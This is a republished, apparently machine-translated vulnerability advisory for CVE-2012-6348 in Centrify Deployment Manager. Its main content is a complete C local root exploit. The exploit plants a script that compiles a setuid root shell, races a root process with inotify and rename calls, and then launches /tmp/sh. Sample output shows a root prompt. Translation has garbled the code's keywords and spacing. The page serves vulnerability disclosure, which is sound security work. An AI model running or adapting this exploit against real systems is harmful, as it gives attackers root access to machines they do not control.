Centrify Deployment Manager Arbitrary File Overwrite Vulnerability

Source: Internet
Author: User
Tags inotify centrify

Release date:
Updated on:

Affected Systems:
Centrinity Deployment Manager 2.1.0.283
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2012-6348
 
Centrify DirectManage Components is a system deployment tool on UNIX/Linux systems.
 
In versions earlier than Centrify Suite 2012.5, Centrify Deployment Manager 2.1.0.283 has a security vulnerability in implementation. This vulnerability allows local users to overwrite arbitrary files by using the symbolic link of adcheckDMoutput temporary files. 2.16.0 the symbolic link attack on the temporary file overwrites any file and then increases the permission.
 
<* Source: inotify & syscall technique
Larry W. Cashdollar (lwc@vapid.dhs.org)

Link: http://web.nvd.nist.gov/view/vuln/detail? VulnId = CVE-2012-6348
Http://seclists.org/fulldisclosure/2012/Dec/59
Http://vapid.dhs.org/exploits/centrify_local_r00t.c
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/* Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
Centrify released a fix very quickly-nice vendor response.
 
CVE-2012-6348 12/17/2012
Http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
Greetings vladz, Thanks for the inotify & syscall technique.
 
This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
 
Run the exploit and wait for administrator to analyze or deploysoftware
To the system.
 
Larry @ h0g :~ /Code/exploit $./cent_root centrify. 2.16.0
[*] Launching attack against "centrify. 2.16.0"
[+] Creating edevil script (/tmp/edevil)
[+] Creating target file (/bin/touch/tmp/centrify. 2.16.0)
[+] Initialize inotify
[+] Waiting for root to launch "centrify. 2.16.0"
[+] Opening root shell (/tmp/sh)
#

Larry W. Cashdollar
@ _ Larry0
*/
 

# Include <stdlib. h>
# Include <stdio. h>
# Include <unistd. h>
# Include <sys/stat. h>
# Include <sys/types. h>
# Include <string. h>
# Include <sys/inotify. h>
# Include <fcntl. h>
# Include <sys/syscall. h>
 
/* Create a small c program to pop us a root shell */
Int create_nasty_shell (char * file ){
Char * s = "#! /Bin/bash \ n"
"Echo 'main () {setuid (0); execve (\"/bin/sh \ ", 0, 0);} '>/tmp/sh. c \ n"
"Cc/tmp/sh. c-o/tmp/sh; chown root: root/tmp/sh \ n"
"Chmod 4755/tmp/sh; \ n ";
 
Int fd = open (file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO );
Write (fd, s, strlen (s ));
Close (fd );
 
Return 0;
}
 

Int main (int argc, char ** argv ){
Int fd, wd;
Char buf [1], * targetpath, * cmd,
* Evilsh = "/tmp/edevil", * trash = "/tmp/trash ";
 
If (argc <2 ){
Printf ("Usage: % s <target file> \ n", argv [0]);
Return 1;
}
 
Printf ("[*] Launching attack against \" % s \ "\ n", argv [1]);
 
Printf ("[+] Creating edevil script (/tmp/edevil) \ n ");
Create_nasty_shell (evilsh );
 
Targetpath = malloc (sizeof (argv [1]) + 6 );
Cmd = malloc (sizeof (char) * 32 );
Sprintf (targetpath, "/tmp/% s", argv [1]);
Sprintf (cmd, "/bin/touch % s", targetpath );
Printf ("[+] Creating target file (% s) \ n", cmd );
System (cmd );
 
Printf ("[+] Initialize inotify \ n ");
Fd = inotify_init ();
Wd = inotify_add_watch (fd, targetpath, IN_ATTRIB );
 
Printf ("[+] Waiting for root to change perms on \" % s \ "\ n", argv [1]);
Syscall (SYS_read, fd, buf, 1 );
Syscall (SYS_rename, targetpath, trash );
Syscall (SYS_rename, evilsh, targetpath );
 
Inotify_rm_watch (fd, wd );
 
Printf ("[+] Opening root shell (/tmp/sh) \ n ");
Sleep (2 );
System ("rm-fr/tmp/trash;/tmp/sh | echo \" [-] Failed .\"");
 
Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Centrinity
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.centrify.com/directmanage/components.asp

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.